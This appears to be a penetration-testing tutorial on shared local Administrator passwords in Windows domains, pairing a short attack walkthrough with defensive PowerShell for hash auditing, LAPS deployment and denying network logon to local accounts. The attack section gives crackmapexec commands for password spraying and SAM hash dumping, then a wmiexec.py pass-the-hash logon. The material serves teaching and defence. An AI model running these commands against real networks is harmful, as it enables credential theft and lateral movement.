Shared Local Administrator Password

  • Typically used in deployment solutions (images that ship with one local Administrator password)

  • Easy for admins to log in to various servers/machines when a problem arises

  • Attackers who obtain the local Administrator hash on one machine can reuse it on every other machine that shares the password
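The third point is also the easiest thing to audit for. As an added example (not part of the original page), the PowerShell function below reads per-host SAM dump lines in the format that crackmapexec --sam prints (user:RID:LMhash:NThash:::, prefixed here with the host address), keeps only the built-in Administrator (RID 500) and reports any NT hash that appears on more than one host. The hostnames and hash values are constructed sample data, not real credentials; the empty LM hash aad3b435... is the only real constant.

```powershell
# Added example: audit SAM dump output for a local Administrator hash shared across hosts.
# Input format (constructed sample, not real data): "<host>  <user>:<rid>:<lmhash>:<nthash>:::"
$SamDump = @'
192.168.130.2  Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
192.168.130.3  Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
192.168.130.4  Administrator:500:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
192.168.130.5  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
192.168.130.5  Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
'@

function Find-SharedLocalAdminHash {
    param([string[]]$Lines)

    # Parse each line; keep only RID 500 (built-in Administrator) entries.
    $records = foreach ($line in $Lines) {
        if ($line -match '^\s*(?<host>\S+)\s+(?<user>[^:]+):(?<rid>\d+):(?<lm>[0-9a-fA-F]{32}):(?<nt>[0-9a-fA-F]{32}):::') {
            if ([int]$Matches.rid -eq 500) {
                [pscustomobject]@{ Host = $Matches.host; User = $Matches.user; NTHash = $Matches.nt.ToLower() }
            }
        }
    }

    # Group by NT hash: any group with more than one host means the password is shared.
    $records | Group-Object NTHash | Where-Object Count -gt 1 | ForEach-Object {
        [pscustomobject]@{
            NTHash    = $_.Name
            HostCount = $_.Count
            Hosts     = ($_.Group.Host -join ', ')
        }
    }
}

# With the sample above this reports one shared hash on 192.168.130.2, .3 and .5;
# 192.168.130.4 has a unique hash and is not listed.
Find-SharedLocalAdminHash -Lines ($SamDump -split "`r?`n") | Format-Table -AutoSize
```

Run it over dump output collected during an authorised assessment of your own estate; every host listed in one row is a single compromise away from all the others in that row.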

Shared Administrator Password

Map the Local Network

crackmapexec smb 192.168.130.1/29

Spray Username and Password across the Network

crackmapexec smb 192.168.130.1/29 -u web1admin -p 'P@ssw0rd' -d trustedsec.int

Dump the SAM database for one specific host

crackmapexec smb 192.168.130.1/29 -u web1admin -p 'P@ssw0rd' -d trustedsec.int --sam

Access the client using the hash found in the previous step

wmiexec.py WORKGROUP/administrator@192.168.130.4 -hashes <hash goes here>

Countermeasures

  • One straightforward fix is Microsoft's Local Administrator Password Solution (LAPS), which gives each machine a unique, regularly rotated local Administrator password stored in Active Directory.

  • Change who is allowed to log on over the network, so that a local account's hash cannot be used remotely even if the password is shared.

LAPS and preventing over-the-network logon with local accounts

On the Domain Controller

  • Download: LAPS.x64.msi

  • Installation steps (Custom Setup in the MSI)

    • Set AdmPwd GPO Extension to "Entire feature will be unavailable" (the client-side extension is only needed on managed machines)

    • Set Management Tools to "Entire feature will be installed on local hard drive"

    • Set Fat client UI to "Entire feature will be unavailable"

After Installation of LAPS

  • Open PowerShell as a user with Schema Admins rights (required for the schema update)

Import the module we have just installed and delegate permissions

# Load the LAPS module that ships with the Management Tools
Import-Module AdmPwd.PS
# Extend the AD schema with the ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime attributes
Update-AdmPwdADSchema
# Allow computers in the OU to write their own password and expiration time
Set-AdmPwdComputerSelfPermission -Identity <"distinguished name of the OU containing the computers">
# Allow a group to read the stored passwords (a different cmdlet from the self-permission one)
Set-AdmPwdReadPasswordPermission -Identity <"distinguished name of the OU containing the computers"> -AllowedPrincipals <"Group Name here">
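The two countermeasures from the list above (LAPS delegation and restricting network logon for local accounts), carried through as one added PowerShell example that is not the page's own code. The OU 'OU=Workstations,DC=trustedsec,DC=int' and the group 'LAPS-Password-Readers' are assumptions for illustration; the LAPS part runs on the domain controller, while the secedit part is written for a single member host (in a domain the same user-right is normally pushed through a GPO under Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment).

```powershell
# Added example, not from the original page. Both parts require an elevated prompt.

# ---- Part 1: LAPS delegation and verification (run on the DC) ----
Import-Module AdmPwd.PS

$OU      = 'OU=Workstations,DC=trustedsec,DC=int'   # assumption: OU holding the managed computers
$Readers = 'LAPS-Password-Readers'                  # assumption: group allowed to read/reset passwords

# Computers may write their own password and expiration time into AD
Set-AdmPwdComputerSelfPermission -OrgUnit $OU
# Only the delegated group may read or force a reset of the stored password
Set-AdmPwdReadPasswordPermission  -OrgUnit $OU -AllowedPrincipals $Readers
Set-AdmPwdResetPasswordPermission -OrgUnit $OU -AllowedPrincipals $Readers

# Check: list every principal that holds extended rights on the OU. Anything here
# other than the intended group can read the ms-Mcs-AdmPwd attribute and should be removed.
Find-AdmPwdExtendedRights -Identity $OU | Format-List

# ---- Part 2: deny network logon to local accounts (run on a member host) ----
# S-1-5-113 is the well-known SID for "NT AUTHORITY\Local account" (native on
# Windows 8.1/2012 R2 and later, added to older systems by KB2871997). Denying it
# SeDenyNetworkLogonRight blocks SMB/WMI logons with any local account, hash or password.
$Inf = Join-Path $env:TEMP 'deny-local-netlogon.inf'
$Db  = Join-Path $env:TEMP 'deny-local-netlogon.sdb'

# Single-quoted here-string so "$CHICAGO$" is not expanded as a variable
@'
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeDenyNetworkLogonRight = *S-1-5-113
'@ | Set-Content -Path $Inf -Encoding Unicode

secedit /configure /db $Db /cfg $Inf /areas USER_RIGHTS

# Check: the exported policy should now list S-1-5-113 under SeDenyNetworkLogonRight
$Export = Join-Path $env:TEMP 'current-policy.inf'
secedit /export /cfg $Export /areas USER_RIGHTS | Out-Null
Select-String -Path $Export -Pattern 'SeDenyNetworkLogonRight'
```

With both in place, a captured local Administrator hash is worth exactly one machine: LAPS ensures no other host shares it, and the deny-network-logon right stops the local account from being used remotely at all.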
